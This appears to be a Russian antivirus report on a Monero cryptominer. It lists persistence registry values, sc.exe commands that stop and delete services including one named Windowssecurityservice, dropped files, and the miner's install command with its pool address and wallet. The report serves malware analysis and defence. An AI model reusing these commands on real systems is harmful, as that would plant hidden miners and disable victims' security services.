Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\Serverdetections] 'ImagePath' = '%WINDIR%\Media\Moneroor\nsems.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\Serverdetections] 'Start' = '00000002' (значение 2 — автоматический запуск службы при загрузке системы)
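- '<SYSTEM32>\sc.exe' stop ╘╞╝ь▓т┐╪╓╞╞ў (имя службы искажено при отображении: байты в кодировке GBK показаны как CP866; исходное имя, по-видимому, «云检测控制器»)
- '<SYSTEM32>\sc.exe' delete ╘╞╝ь▓т┐╪╓╞╞ў (то же имя службы)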
- '%WINDIR%\Media\Moneroor\nsems.exe' install Serverdetections Mrolsmic.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 49khxCxN3xLJmmYnmtei2Z2gH4WZWi9NC8A1WCnBnKLcEN6JjxBykpwc59f21KZcLR2JMuFqToxim3cKCoCM5w6i62NqqaC ...
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\Media\Moneroor\3.bat" "
- '<SYSTEM32>\sc.exe' stop Windowssecurityservice
- '<SYSTEM32>\sc.exe' delete Windowssecurityservice
- %WINDIR%\Media\Moneroor\nsems.exe
- %WINDIR%\Media\Moneroor\Mrolsmic.exe
- %WINDIR%\Media\Moneroor\ssleay32.dll
- %WINDIR%\Media\Moneroor\3.bat
- %WINDIR%\Media\Moneroor\zlib1.dll
- %WINDIR%\Media\Moneroor\libeay32.dll
- %WINDIR%\Media\Moneroor\libcurl.dll
- %WINDIR%\Media\Moneroor\libgcc_s_seh-1.dll
- %WINDIR%\Media\Moneroor\libwinpthread-1.dll
- %WINDIR%\Media\Moneroor\libstdc++-6.dll
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''